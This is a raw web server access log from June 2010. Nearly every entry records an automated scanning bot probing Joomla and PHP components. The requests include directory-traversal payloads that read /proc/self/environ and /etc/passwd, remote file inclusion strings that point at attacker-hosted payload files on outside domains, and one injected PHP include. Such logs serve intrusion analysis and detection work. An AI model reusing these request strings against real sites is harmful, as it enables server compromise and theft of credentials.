219.240.36.36 - - [13/Jun/2010:03:49:38 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:03:49:38 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:03:49:45 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
209.200.244.57 - - [13/Jun/2010:03:51:33 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:03:51:33 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.108.254.21 - - [13/Jun/2010:03:53:39 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.108.254.21 - - [13/Jun/2010:03:53:39 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
67.108.254.21 - - [13/Jun/2010:03:53:39 -0500] "GET /logs/access_log.1271548800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.108.254.21 - - [13/Jun/2010:03:56:34 -0500] "GET /logs/access_log.1271548800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.108.254.21 - - [13/Jun/2010:03:56:34 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.108.254.21 - - [13/Jun/2010:03:56:34 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
68.178.194.232 - - [13/Jun/2010:03:56:46 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:03:56:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:03:56:46 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.811"
68.178.194.232 - - [13/Jun/2010:03:57:06 -0500] "GET /logs/access_log.1273622400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.811"
93.159.16.132 - - [13/Jun/2010:03:58:53 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:03:58:54 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:03:58:54 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
93.159.16.132 - - [13/Jun/2010:03:59:09 -0500] "GET /logs/access_log.1273622400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
194.146.226.69 - - [13/Jun/2010:04:00:22 -0500] "GET /logs/?sourcedir=http://pipod.tv/carol.txt???? HTTP/1.1" 200 9328 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:04:00:22 -0500] "GET /?sourcedir=http://pipod.tv/carol.txt???? HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
219.240.36.36 - - [13/Jun/2010:04:01:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
173.236.27.186 - - [13/Jun/2010:04:05:08 -0500] "GET //common/db.php?commonpath=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
173.236.27.186 - - [13/Jun/2010:04:05:08 -0500] "GET /logs/access_log.1271548800//common/db.php?commonpath=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
173.236.27.186 - - [13/Jun/2010:04:05:08 -0500] "GET /logs//common/db.php?commonpath=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
219.240.36.36 - - [13/Jun/2010:04:06:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:04:06:49 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:04:06:49 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
72.18.137.210 - - [13/Jun/2010:04:07:57 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:04:07:57 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:04:08:09 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:04:08:09 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.71.108.28 - - [13/Jun/2010:04:08:18 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
202.71.108.28 - - [13/Jun/2010:04:08:18 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
189.108.172.26 - - [13/Jun/2010:04:09:08 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:04:09:09 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:04:09:10 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
99.25.242.52 - - [13/Jun/2010:04:10:35 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; 3P_PCPC 1.0.7.1; 3P_UVRM 1.0.14.4; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)"
202.71.108.28 - - [13/Jun/2010:04:10:50 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
121.254.172.27 - - [13/Jun/2010:04:12:02 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/tail.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.254.172.27 - - [13/Jun/2010:04:12:02 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/tail.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.254.172.27 - - [13/Jun/2010:04:12:03 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/tail.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
174.121.237.135 - - [13/Jun/2010:04:12:22 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
174.121.237.135 - - [13/Jun/2010:04:12:22 -0500] "GET /logs/access_log.1272499200//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
174.121.237.135 - - [13/Jun/2010:04:12:22 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.121.237.135 - - [13/Jun/2010:04:12:28 -0500] "GET /logs/access_log.1272672000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
188.40.178.145 - - [13/Jun/2010:04:12:36 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.40.178.145 - - [13/Jun/2010:04:12:36 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
109.71.41.45 - - [13/Jun/2010:04:13:06 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:04:13:07 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
202.71.108.28 - - [13/Jun/2010:04:13:15 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
202.71.108.28 - - [13/Jun/2010:04:13:16 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
202.71.108.28 - - [13/Jun/2010:04:13:17 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
202.71.108.28 - - [13/Jun/2010:04:13:20 -0500] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
202.71.108.28 - - [13/Jun/2010:04:13:21 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.204.229 - - [13/Jun/2010:04:14:36 -0500] "GET /logs/access_log.1216944000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.73.44.2 - - [13/Jun/2010:04:14:48 -0500] "GET //common/db.php?commonpath=http://www.ahkba.org/ahkba/components/com_jomcomment/includes/idxx.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
76.73.44.2 - - [13/Jun/2010:04:14:48 -0500] "GET /logs//common/db.php?commonpath=http://www.ahkba.org/ahkba/components/com_jomcomment/includes/idxx.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
76.73.44.2 - - [13/Jun/2010:04:14:50 -0500] "GET /logs/access_log.1229212800//common/db.php?commonpath=http://www.ahkba.org/ahkba/components/com_jomcomment/includes/idxx.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
194.146.226.69 - - [13/Jun/2010:04:15:58 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:04:15:58 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
189.108.172.26 - - [13/Jun/2010:04:16:12 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:04:16:12 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:04:16:13 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
58.120.226.47 - - [13/Jun/2010:04:17:03 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:04:17:03 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:04:17:03 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.93.240.63 - - [13/Jun/2010:04:19:13 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:19:13 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:19:27 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:19:27 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:19:29 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:19:29 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:19:45 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:19:45 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.124.198.60 - - [13/Jun/2010:04:20:00 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:00 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:00 -0500] "GET /logs/access_log.1273622400%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:04 -0500] "GET /logs/access_log.1273622400%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 380 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:04 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:04 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:05 -0500] "GET /logs/access_log.1272499200//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:10 -0500] "GET /logs/access_log.1272672000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:12 -0500] "GET /logs/access_log.1272499200//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:20:12 -0500] "GET /logs/access_log.1272672000//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.93.240.63 - - [13/Jun/2010:04:20:14 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:20:14 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:20:14 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:20:14 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:20:22 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:20:22 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:20:40 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:20:40 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [13/Jun/2010:04:20:56 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.805"
187.45.193.159 - - [13/Jun/2010:04:20:56 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
74.124.198.60 - - [13/Jun/2010:04:21:03 -0500] "GET /logs/access_log.1271548800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
74.124.198.60 - - [13/Jun/2010:04:21:23 -0500] "GET /logs/access_log.1271548800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lungcheong.cn//news/20071130/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.93.240.63 - - [13/Jun/2010:04:22:48 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:22:48 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:22:48 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:22:48 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:22:49 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:22:49 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:22:49 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:22:50 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:22:57 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:22:57 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:22:59 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:22:59 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:22:59 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:22:59 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:23:00 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:23:00 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:23:00 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:23:00 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:23:01 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:23:01 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:23:04 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:23:04 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:23:07 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:23:08 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:23:08 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.63 - - [13/Jun/2010:04:23:09 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:23:09 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [13/Jun/2010:04:23:09 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
188.72.70.56 - - [13/Jun/2010:04:23:11 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:04:23:11 -0500] "GET /logs/errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:04:23:11 -0500] "GET /errors.php?error=http://www.ysymca.or.kr/bbs/icon/fx1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.93.240.60 - - [13/Jun/2010:04:23:13 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.60 - - [13/Jun/2010:04:23:13 -0500] "GET /index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.99 - - [13/Jun/2010:04:23:14 -0500] "GET /logs/index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
